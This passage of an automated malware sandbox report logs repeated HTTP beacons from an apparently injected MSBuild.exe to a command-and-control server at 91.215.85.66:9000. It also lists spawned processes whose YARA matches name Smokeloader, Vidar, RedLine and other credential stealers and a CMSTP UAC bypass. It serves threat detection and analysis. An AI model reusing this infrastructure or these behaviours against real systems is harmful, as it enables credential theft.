Apr 27, 2024 00:47:52.716129065 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:52 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49845	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:53.039226055 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:53.251751900 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:52 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49846	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:53.577512026 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:53.798930883 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:53 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49847	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:54.113437891 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:54.339267015 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:53 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49848	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:54.655760050 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:54.859561920 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:54 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49849	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:55.362658978 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:55.888792038 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49850	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:56.363934994 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:56.607753038 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49851	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:56.915712118 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:57.118715048 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49852	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:57.429472923 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:57.634852886 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49853	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:57.955780029 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:58.159933090 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49854	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:58.469552040 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:58.674545050 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49855	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:58.991636992 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:59.195709944 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:58 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49856	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:59.516633987 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:59.732539892 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:58 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49857	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:48:00.048228979 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:48:00.255479097 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:59 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49858	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:48:00.579983950 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:48:00.790796041 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:59 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49859	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:48:01.097731113 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:48:01.302412033 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:48:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49860	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:48:01.613243103 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:48:01.820952892 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:48:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49861	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:48:04.413181067 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:48:04.978514910 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:48:04 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49862	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:48:05.297995090 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:48:06.473850965 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:48:06 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49864	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:48:06.790563107 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:48:07.000458002 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:48:06 GMT

Target ID:	0
Start time:	00:45:58
Start date:	27/04/2024
Path:	C:\Users\user\Desktop\kO1P1YnLst.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kO1P1YnLst.exe"
Imagebase:	0x400000
File size:	460'289 bytes
MD5 hash:	18D635DBC4392C2470EB97D1063E8484
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1830645130.00000000070B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:46:03
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5c4.0.exe"
Imagebase:	0x400000
File size:	294'912 bytes
MD5 hash:	15185ECF8919789DD51FB83FA01CB66B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2500065620.0000000004354000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:46:09
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe"
Imagebase:	0xd90000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:46:12
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:46:12
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	00:46:12
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5c4.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5c4.3.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1829719005.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:46:13
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 944
Imagebase:	0x2c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	00:46:36
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe"
Imagebase:	0xd90000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:46:37
Start date:	27/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x840000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	00:46:37
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:46:38
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:46:42
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Imagebase:	0x240f1950000
File size:	59'721'128 bytes
MD5 hash:	8E9C467EAC35B35DA1F586014F29C330
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000000.2126631376.00000240F198B000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	00:46:55
Start date:	27/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x420000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:47:17
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	00:47:17
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	00:47:17
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"
Imagebase:	0xe40000
File size:	545'792 bytes
MD5 hash:	6C93FC68E2F01C20FB81AF24470B790C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	00:47:17
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
